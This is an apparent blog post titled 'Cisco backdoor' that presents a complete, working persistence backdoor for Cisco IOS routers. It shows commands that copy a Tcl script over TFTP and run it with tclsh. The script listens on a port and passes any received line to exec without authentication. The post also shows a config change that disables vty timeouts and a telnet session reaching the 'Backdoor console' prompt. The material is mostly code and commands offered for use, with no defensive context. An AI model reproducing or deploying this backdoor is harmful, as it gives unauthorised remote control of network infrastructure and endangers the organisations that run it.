April 1, 2011

Cisco backdoor

Router# copy tftp://TFTP_SERVER_ADDRESS/script.tcl flash://script.tcl 
Router# tclsh flash://script.tcl

proc callback {sock addr port} {
fconfigure $sock -translation crlf -buffering line
puts $sock "Backdoor console:"
puts $sock " "
puts -nonewline $sock "Router# "
flush $sock
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
flush $sock
if {[catch {gets $sock line}] ||
[eof $sock]} {
return [close $sock]
}
catch {exec $line} result
if {[catch {puts $sock $result}]} {
return [close $sock]
}
puts -nonewline $sock "Router# "
flush $sock
}

set port NUMBER_OF_PORT
set sh [socket -server callback $port]
vwait var
close $sh

Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#line vty 0 4
Router(config-line)#exec-timeout 0 0

Router#show processes cpu | i Tcl
Router#show control-plane host open-ports

telnet router NUMBER_OF_PORT
Trying 10.0.0.1 ...
Connected to router.
Escape character is '^]'.

Backdoor console:

Router#

No comments:

Post a Comment